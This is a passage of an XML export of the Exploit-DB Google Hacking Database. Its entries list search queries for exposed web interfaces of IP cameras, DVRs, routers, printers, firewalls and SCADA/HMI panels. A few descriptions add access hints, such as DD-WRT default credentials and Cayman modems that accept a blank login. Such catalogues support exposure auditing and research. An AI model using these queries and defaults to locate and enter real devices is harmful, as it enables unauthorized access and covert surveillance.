<querystring>https://www.google.com/search?q=intitle:%22AXIS+240+Camera+Server%22+intext:%22server+push%22+-help&amp;rls=org.mozilla:en-US:official&amp;start=10&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2005-06-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>531</id>
<link>https://www.exploit-db.com/ghdb/531</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;axis storpoint CD&quot; intitle:&quot;ip address&quot;</shortDescription>
<textualDescription>Axis' network CD/DVD servers are faster, less costly and easier to manage than using full-blown file servers for networking CD/DVD collections. Any organization that relies heavily on CD/DVD-based information can benefit from an AXIS StorPoint CD+.</textualDescription>
<query>intitle:&quot;axis storpoint CD&quot; intitle:&quot;ip address&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22axis+storpoint+CD%22+intitle:%22ip+address%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1154</id>
<link>https://www.exploit-db.com/ghdb/1154</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Biromsoft WebCam&quot; -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000</shortDescription>
<textualDescription>Brimsoft webcam software enables anyone with a webcam to easily create a webcam http server. This googledork looks for these webcam servers.</textualDescription>
<query>intitle:&quot;Biromsoft WebCam&quot; -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000</query>
<querystring>https://www.google.com/search?q=intitle:%22Biromsoft+WebCam%22+-4.0+-serial+-ask+-crack+-software+-a+-the+-build+-download+-v4+-3.01+-numrange:1-10000&amp;num=100&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2005-09-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>7085</id>
<link>https://www.exploit-db.com/ghdb/7085</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Blue Iris Remote View&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Blue Iris Remote View&quot;
# Various Online Devices
# Date: 18/07/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;Blue Iris Remote View&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Blue Iris Remote View&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>1394</id>
<link>https://www.exploit-db.com/ghdb/1394</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;BlueNet Video Viewer&quot;</shortDescription>
<textualDescription>Near broadcast quality video over the internet. A full 30fps at the 320 X 240 size. 12fps at the 640 X 480 size. The BlueNet video server will accept virtually any type of camera, wireless receivers, DVRs, multiplexes, etc. Display and access any security system live from anywhere in the world utilizing the web. All you need is an Internet browser to view the image. Uses ActiveX.</textualDescription>
<query>intitle:&quot;BlueNet Video Viewer&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22BlueNet+Video+Viewer%22&amp;filter=0</querystring>
<edb></edb>
<date>2006-06-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>346</id>
<link>https://www.exploit-db.com/ghdb/346</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;BorderManager Information alert&quot;</shortDescription>
<textualDescription>This is an Informational message produced by the Novell BorderManager firewall/proxy server. Attackers can located perimeter defence systems with this query.</textualDescription>
<query>intitle:&quot;BorderManager Information alert&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22BorderManager+Information+alert%22</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>904</id>
<link>https://www.exploit-db.com/ghdb/904</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;BorderWare MXtreme Mail Firewall Login&quot;</shortDescription>
<textualDescription>BorderWare MXtreme Mail firewallMXtreme is a hardened appliance with a highly robust mail transfer agent (MTA) and email gateway that prevents email-borne threats from entering your network while protecting against spam and viruses.</textualDescription>
<query>intitle:&quot;BorderWare MXtreme Mail Firewall Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22BorderWare+MXtreme+Mail+Firewall+Login%22</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>6897</id>
<link>https://www.exploit-db.com/ghdb/6897</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Bosch Security Systems&quot; &quot;LIVEPAGE&quot; + &quot;SETTINGS&quot; -.net -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Bosch Security Systems&quot; &quot;LIVEPAGE&quot; + &quot;SETTINGS&quot; -.net -.com
# Various Online Devices.
# Date: 28/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Bosch Security Systems&quot; &quot;LIVEPAGE&quot; + &quot;SETTINGS&quot; -.net -.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Bosch Security Systems&quot; &quot;LIVEPAGE&quot; + &quot;SETTINGS&quot; -.net -.com</querystring>
<edb></edb>
<date>2021-04-28</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7208</id>
<link>https://www.exploit-db.com/ghdb/7208</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Bose SoundTouch Wi-Fi Music System Setup&quot; inurl:&quot;/setup/index.asp&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Bose SoundTouch Wi-Fi Music System Setup&quot; inurl:&quot;/setup/index.asp&quot;
# Various Online Devices
# Date: 10/09/2021
# Exploit Author: Mugdha Peter Bansode</textualDescription>
<query>intitle:&quot;Bose SoundTouch Wi-Fi Music System Setup&quot; inurl:&quot;/setup/index.asp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Bose SoundTouch Wi-Fi Music System Setup&quot; inurl:&quot;/setup/index.asp&quot;</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>828</id>
<link>https://www.exploit-db.com/ghdb/828</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Browser Launch Page&quot;</shortDescription>
<textualDescription>An ActiveX based webcam - so use MS IE</textualDescription>
<query>intitle:&quot;Browser Launch Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Browser+Launch+Page%22</querystring>
<edb></edb>
<date>2005-01-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>7295</id>
<link>https://www.exploit-db.com/ghdb/7295</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;C-more -- the best HMI presented by AutomationDirect&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;C-more -- the best HMI presented by AutomationDirect&quot;</textualDescription>
<query>intitle:&quot;C-more -- the best HMI presented by AutomationDirect&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;C-more -- the best HMI presented by AutomationDirect&quot;</querystring>
<edb></edb>
<date>2021-09-24</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7026</id>
<link>https://www.exploit-db.com/ghdb/7026</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Cambium&quot; inurl:top.cgi</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Cambium&quot; inurl:top.cgi
# Category: Various Online Devices
# Date: 05/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Cambium&quot; inurl:top.cgi</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Cambium&quot; inurl:top.cgi</querystring>
<edb></edb>
<date>2021-07-21</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6977</id>
<link>https://www.exploit-db.com/ghdb/6977</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Camera Status&quot; inurl:/control/</shortDescription>
<textualDescription># Exploit Title: Various Online Devices
# Google Dork: intitle:&quot;Camera Status&quot; inurl:/control/
# Date: 2021-05-21
# Exploit Author: Anmol K Sachan
</textualDescription>
<query>intitle:&quot;Camera Status&quot; inurl:/control/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Camera Status&quot; inurl:/control/</querystring>
<edb></edb>
<date>2021-06-01</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>781</id>
<link>https://www.exploit-db.com/ghdb/781</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Cayman-DSL.home&quot;</shortDescription>
<textualDescription>Cayman DSL modems. Many Cayman units have a weakness where even if remote administration is disabled, some older firmwares will still allow validation if proper login credentials are supplied. In many cases, simply hitting enter will be enough to authenticate. It's worth noting, many of the vulnerable devices also support telnet right out of the box, as opposed to the linksys models which require a firmware patch.</textualDescription>
<query>intitle:&quot;Cayman-DSL.home&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Cayman-DSL.home%22</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>7247</id>
<link>https://www.exploit-db.com/ghdb/7247</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;CirCarLife Scada&quot; inurl:/html/index.html</shortDescription>
<textualDescription># Google Dork: intitle:&quot;CirCarLife Scada&quot; inurl:/html/index.html
# Various Online Devices
# Date: 088/08/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;CirCarLife Scada&quot; inurl:/html/index.html</query>
<querystring>https://www.google.com/search?q=intitle:&quot;CirCarLife Scada&quot; inurl:/html/index.html</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7091</id>
<link>https://www.exploit-db.com/ghdb/7091</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Cisco ASDM&quot; inurl:&quot;admin/public/index.html&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Cisco ASDM&quot; inurl:&quot;admin/public/index.html&quot;
# Date: 29/07/2021
# Exploit Author: Marko Žlender
</textualDescription>
<query>intitle:&quot;Cisco ASDM&quot; inurl:&quot;admin/public/index.html&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Cisco ASDM&quot; inurl:&quot;admin/public/index.html&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>7234</id>
<link>https://www.exploit-db.com/ghdb/7234</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Codian MCU&quot; &quot;MCU&quot; &quot;Home Streaming Conferences&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Codian MCU&quot; &quot;MCU&quot; &quot;Home Streaming Conferences&quot;
# Various Online Devices
# Date: 15/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Codian MCU&quot; &quot;MCU&quot; &quot;Home Streaming Conferences&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Codian MCU&quot; &quot;MCU&quot; &quot;Home Streaming Conferences&quot;</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>1013</id>
<link>https://www.exploit-db.com/ghdb/1013</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;configuration&quot; inurl:port_0</shortDescription>
<textualDescription>More dell and lexmark printers, The usual things included.</textualDescription>
<query>intitle:&quot;configuration&quot; inurl:port_0</query>
<querystring>https://www.google.com/search?safe=off&amp;c2coff=1&amp;q=intitle%3A%22configuration%22+inurl%3Aport_0</querystring>
<edb></edb>
<date>2005-06-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>6831</id>
<link>https://www.exploit-db.com/ghdb/6831</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;ContaCam&quot; &quot;Snapshot Image&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;ContaCam&quot; &quot;Snapshot Image&quot;
# Various online devices.
# Date: 15/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;ContaCam&quot; &quot;Snapshot Image&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ContaCam&quot; &quot;Snapshot Image&quot;</querystring>
<edb></edb>
<date>2021-03-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4152</id>
<link>https://www.exploit-db.com/ghdb/4152</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;CPPLUS DVR -Web View&quot;</shortDescription>
<textualDescription>CPPLUS DVR
- Stefano</textualDescription>
<query>intitle:&quot;CPPLUS DVR -Web View&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;CPPLUS DVR -Web View&quot;</querystring>
<edb></edb>
<date>2015-12-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>7019</id>
<link>https://www.exploit-db.com/ghdb/7019</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;CPU-Modul TROVIS 6610&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;CPU-Modul TROVIS 6610&quot;
# Various Online Devices
# Date: 16/06/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;CPU-Modul TROVIS 6610&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;CPU-Modul TROVIS 6610&quot;</querystring>
<edb></edb>
<date>2021-07-20</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>4551</id>
<link>https://www.exploit-db.com/ghdb/4551</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;cuckoo sandbox&quot; &quot;failed_reporting&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;cuckoo sandbox&quot; &quot;failed_reporting&quot;
Description: Find open Cuckoo sanboxes! Free samples!
Author: scumsec</textualDescription>
<query>intitle:&quot;cuckoo sandbox&quot; &quot;failed_reporting&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;cuckoo sandbox&quot; &quot;failed_reporting&quot;</querystring>
<edb></edb>
<date>2017-07-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>7188</id>
<link>https://www.exploit-db.com/ghdb/7188</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;D-LINK CORPORATION, INC&quot; intext:&quot;D-Link Corporation, Inc.&quot; -dlink.ca</shortDescription>
<textualDescription># Google Dork:intitle:&quot;D-LINK CORPORATION, INC&quot; intext:&quot;D-Link Corporation, Inc.&quot; -dlink.ca
# Pages Containing Login Portals
# Date: 08/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;D-LINK CORPORATION, INC&quot; intext:&quot;D-Link Corporation, Inc.&quot; -dlink.ca</query>
<querystring>https://www.google.com/search?q=intitle:&quot;D-LINK CORPORATION, INC&quot; intext:&quot;D-Link Corporation, Inc.&quot; -dlink.ca</querystring>
<edb></edb>
<date>2021-09-10</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6783</id>
<link>https://www.exploit-db.com/ghdb/6783</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;D-LINK SYSTEMS, INC. | Web File Access : Login&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;D-LINK SYSTEMS, INC. | Web File Access : Login&quot;</textualDescription>
<query>intitle:&quot;D-LINK SYSTEMS, INC. | Web File Access : Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;D-LINK SYSTEMS, INC. | Web File Access : Login&quot;</querystring>
<edb></edb>
<date>2021-02-08</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6899</id>
<link>https://www.exploit-db.com/ghdb/6899</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;DD-WRT (build 21061) - Info&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;DD-WRT (build 21061) - Info&quot;
# Various Online Devices.
# Date: 28/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;DD-WRT (build 21061) - Info&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;DD-WRT (build 21061) - Info&quot;</querystring>
<edb></edb>
<date>2021-04-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3814</id>
<link>https://www.exploit-db.com/ghdb/3814</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;dd-wrt info&quot; intext:&quot;Firmware: DD-WRT&quot;</shortDescription>
<textualDescription>This dork finds web interfaces of various routers using custom firmware DD-WRT.
Default login: root
Default password: admin
greetings, uA</textualDescription>
<query>intitle:&quot;dd-wrt info&quot; intext:&quot;Firmware: DD-WRT&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;dd-wrt info&quot; intext:&quot;Firmware: DD-WRT&quot;</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>540</id>
<link>https://www.exploit-db.com/ghdb/540</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;DEFAULT_CONFIG - HP&quot;</shortDescription>
<textualDescription>searches for the web interface of HP switches.</textualDescription>
<query>intitle:&quot;DEFAULT_CONFIG - HP&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22DEFAULT_CONFIG+-+HP%22&amp;oe=UTF-8</querystring>
<edb></edb>
<date>2004-10-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>867</id>
<link>https://www.exploit-db.com/ghdb/867</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;DEFAULT_CONFIG - HP&quot;</shortDescription>
<textualDescription>High scalable Ethernet switches by HP running in the default configuration</textualDescription>
<query>intitle:&quot;DEFAULT_CONFIG - HP&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22DEFAULT_CONFIG+-+HP%22</querystring>
<edb></edb>
<date>2005-02-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>987</id>
<link>https://www.exploit-db.com/ghdb/987</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Dell *&quot; inurl:port_0</shortDescription>
<textualDescription>oA few Online Dell Printers, status, paper, toner levels, ips macs, the usual.. (Lexmark and Dell seem to share the same embedded webserver it seems, try changing the vendor name.)</textualDescription>
<query>intitle:&quot;Dell *&quot; inurl:port_0</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Dell+*%22+inurl%3Aport_0&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-05-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>1235</id>
<link>https://www.exploit-db.com/ghdb/1235</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Dell Laser Printer *&quot; port_0 -johnny.ihackstuff</shortDescription>
<textualDescription>Dell laser printers. This search finds different results that dork id 1077.</textualDescription>
<query>intitle:&quot;Dell Laser Printer *&quot; port_0 -johnny.ihackstuff</query>
<querystring>https://www.google.com/search?q=*+intitle%3A%22Dell+Laser+Printer+*%22+port_0+-johnny.ihackstuff</querystring>
<edb></edb>
<date>2006-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>1014</id>
<link>https://www.exploit-db.com/ghdb/1014</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Dell Laser Printer M5200&quot; port_0</shortDescription>
<textualDescription>Dell Laser Printer M5200</textualDescription>
<query>intitle:&quot;Dell Laser Printer M5200&quot; port_0</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;as_qdr=all&amp;q=intitle%3A%22Dell+Laser+Printer+M5200%22+port_0</querystring>
<edb></edb>
<date>2005-06-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>884</id>
<link>https://www.exploit-db.com/ghdb/884</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Dell Laser Printer&quot; ews</shortDescription>
<textualDescription>Finds Dell's printers with EWS.EWS : Embedded Web Server technology enables the usage of a standard web browser to manage many aspects of the printer, for example, view consumable life, configure network parameters, view serial number information, printer usage etc..</textualDescription>
<query>intitle:&quot;Dell Laser Printer&quot; ews</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Dell+Laser+Printer%22+ews</querystring>
<edb></edb>
<date>2005-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>6964</id>
<link>https://www.exploit-db.com/ghdb/6964</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Dell OpenManage Switch Administrator&quot; intext:&quot;Type in Username and Password, then click OK&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;Dell OpenManage Switch Administrator&quot; intext:&quot;Type in Username and Password, then click OK&quot;</textualDescription>
<query>intitle:&quot;Dell OpenManage Switch Administrator&quot; intext:&quot;Type in Username and Password, then click OK&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Dell OpenManage Switch Administrator&quot; intext:&quot;Type in Username and Password, then click OK&quot;</querystring>
<edb></edb>
<date>2021-05-28</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>1365</id>
<link>https://www.exploit-db.com/ghdb/1365</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Device Status Summary Page&quot; -demo</shortDescription>
<textualDescription>hxxp://www.netbotz.com/products/index.htmlNetwork/server/room security and enviromental alarm device.O yea, they have cameras on them, fun to watch IT people...... wooIncludes:Temperature (ÂðF)Humidity (%)Air Flow (ft/min)Audio Alarm:Door Switch:</textualDescription>
<query>intitle:&quot;Device Status Summary Page&quot; -demo</query>
<querystring>https://www.google.com/search?q=intitle:%22Device+Status+Summary+Page%22+-demo&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>5086</id>
<link>https://www.exploit-db.com/ghdb/5086</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Device(&quot; AND intext:&quot;Network Camera&quot; AND &quot;language:&quot; AND &quot;Password&quot;</shortDescription>
<textualDescription>Dork about ReeCam IP Camera
intitle:&quot;Device(&quot; AND intext:&quot;Network Camera&quot; AND &quot;language:&quot; AND &quot;Password&quot;
Author : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R
</textualDescription>
<query>intitle:&quot;Device(&quot; AND intext:&quot;Network Camera&quot; AND &quot;language:&quot; AND &quot;Password&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Device(&quot; AND intext:&quot;Network Camera&quot; AND &quot;language:&quot; AND &quot;Password&quot;</querystring>
<edb></edb>
<date>2019-02-05</date>
<author>Brain Reflow</author>
</entry>
<entry>
<id>6944</id>
<link>https://www.exploit-db.com/ghdb/6944</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Device(&quot; intext:&quot;ActiveX Mode (For IE Browser)&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;Device(&quot; intext:&quot;ActiveX Mode (For IE Browser)&quot;</textualDescription>
<query>intitle:&quot;Device(&quot; intext:&quot;ActiveX Mode (For IE Browser)&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Device(&quot; intext:&quot;ActiveX Mode (For IE Browser)&quot;</querystring>
<edb></edb>
<date>2021-05-18</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7215</id>
<link>https://www.exploit-db.com/ghdb/7215</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Device(Foscam)&quot; &quot;Real-time IP Camera Monitoring System&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Device(Foscam)&quot; &quot;Real-time IP Camera Monitoring System&quot;
# Various Online Devices
# Date: 12/09/2021
# Exploit Author: Mugdha Peter Bansode</textualDescription>
<query>intitle:&quot;Device(Foscam)&quot; &quot;Real-time IP Camera Monitoring System&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Device(Foscam)&quot; &quot;Real-time IP Camera Monitoring System&quot;</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>1391</id>
<link>https://www.exploit-db.com/ghdb/1391</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Divar Web Client&quot;</shortDescription>
<textualDescription>Boshe/Divar Net Cameras. Uses ActiveX - IE only.</textualDescription>
<query>intitle:&quot;Divar Web Client&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22Divar+Web+Client%22</querystring>
<edb></edb>
<date>2006-06-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>474</id>
<link>https://www.exploit-db.com/ghdb/474</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;dreambox web&quot;</shortDescription>
<textualDescription>this search will show web administration interfaces of linux dream boxes.The Dreambox is one of the popular 3rd generation boxes. Based on a powerful IBM PowerPC (not PC !) with an MPEG1/2 hardware decoder, this box is FULLY open, with an open source Linux operating system. The Dreambox not only offers high quality video and audio, but also has a variety of connections to the outside world: Ethernet, USB, PS2, Compact Flash and two Smartcard readers. The box can handle any dish configuration, an unlimited number of channels or satellites, has a very fast channel scan, allows for direct digital recording, etc.</textualDescription>
<query>intitle:&quot;dreambox web&quot;</query>
<querystring>https://www.google.com/search?hl=de&amp;q=intitle%3A%22dreambox+web%22+&amp;btnG=Google-Suche</querystring>
<edb></edb>
<date>2004-09-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>6901</id>
<link>https://www.exploit-db.com/ghdb/6901</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;DSM mobile&quot; intext:&quot;Loading...&quot;</shortDescription>
<textualDescription># Google Dork:intitle:&quot;DSM mobile&quot; intext:&quot;Loading...&quot;
# Various Online Devices.
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;DSM mobile&quot; intext:&quot;Loading...&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;DSM mobile&quot; intext:&quot;Loading...&quot;</querystring>
<edb></edb>
<date>2021-04-30</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>1290</id>
<link>https://www.exploit-db.com/ghdb/1290</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;DVR Client&quot; -the -free -pdf -downloads -blog -download -dvrtop</shortDescription>
<textualDescription>This dork finds digital video recording client from Nuvico.</textualDescription>
<query>intitle:&quot;DVR Client&quot; -the -free -pdf -downloads -blog -download -dvrtop</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22DVR+Client%22+-the+-free+-pdf+-downloads+-blog+-download+-dvrtop</querystring>
<edb></edb>
<date>2006-03-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>584</id>
<link>https://www.exploit-db.com/ghdb/584</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;DVR Web client&quot;</shortDescription>
<textualDescription>This embedded DVR is quick plug and play. Just plug it in and it will start recording. You can view all the cameras at once or one at a time. Allows individual pictures to come up on play back or all together. The best feature is the ability to connect via a network and play back existing stored video or view images live.* Four Channel Input* Horizontal Resolution 480 Lines* 16.7 Million Color Output* Display In Quad or Single Image (Full MultiPlex)* Motion Detection* Scheduling* Zoom in Live and Playback* 720H X 480V (Full) 360H X 240V In Quad* 0.1 FPS Thru 15 FPS each camera (60 FPS Total)* Web Interface TCP/IP With Client Software* Back-Up With Mark Image, VCR, Time Lapse, Remote Client Software* Full Remote Camera Controls (PTZ), Alarms, Wiper, Fans, Etc.</textualDescription>
<query>intitle:&quot;DVR Web client&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22DVR+Web+client%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>1292</id>
<link>https://www.exploit-db.com/ghdb/1292</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Edr1680 remote viewer&quot;</shortDescription>
<textualDescription>This search finds the 1680 series digital video recorder from EverFocus.</textualDescription>
<query>intitle:&quot;Edr1680 remote viewer&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;rls=org.mozilla%3Aen-US%3Aofficial_s&amp;q=intitle%3A%22Edr1680+remote+viewer%22</querystring>
<edb></edb>
<date>2006-03-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>7315</id>
<link>https://www.exploit-db.com/ghdb/7315</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;EnvisionGateway&quot; &quot;scheduler&quot; &quot;control&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;EnvisionGateway&quot; &quot;scheduler&quot; &quot;control&quot;
# Various Online Devices
# Date: 31/08/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;EnvisionGateway&quot; &quot;scheduler&quot; &quot;control&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;EnvisionGateway&quot; &quot;scheduler&quot; &quot;control&quot;</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>6826</id>
<link>https://www.exploit-db.com/ghdb/6826</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;ePMP 2000&quot; &quot;notifications&quot; &quot;Menu&quot; -pdf</shortDescription>
<textualDescription># Google Dork: intitle:&quot;ePMP 2000&quot; &quot;notifications&quot; &quot;Menu&quot; -pdf
# Various online devices.
# Date: 12/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;ePMP 2000&quot; &quot;notifications&quot; &quot;Menu&quot; -pdf</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ePMP 2000&quot; &quot;notifications&quot; &quot;Menu&quot; -pdf</querystring>
<edb></edb>
<date>2021-03-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6873</id>
<link>https://www.exploit-db.com/ghdb/6873</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Epson Web Control&quot; &quot;OSD Control Pad&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Epson Web Control&quot; &quot;OSD Control Pad&quot;
# Various online devices (Epson printers).
# Date: 13/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Epson Web Control&quot; &quot;OSD Control Pad&quot;</query>
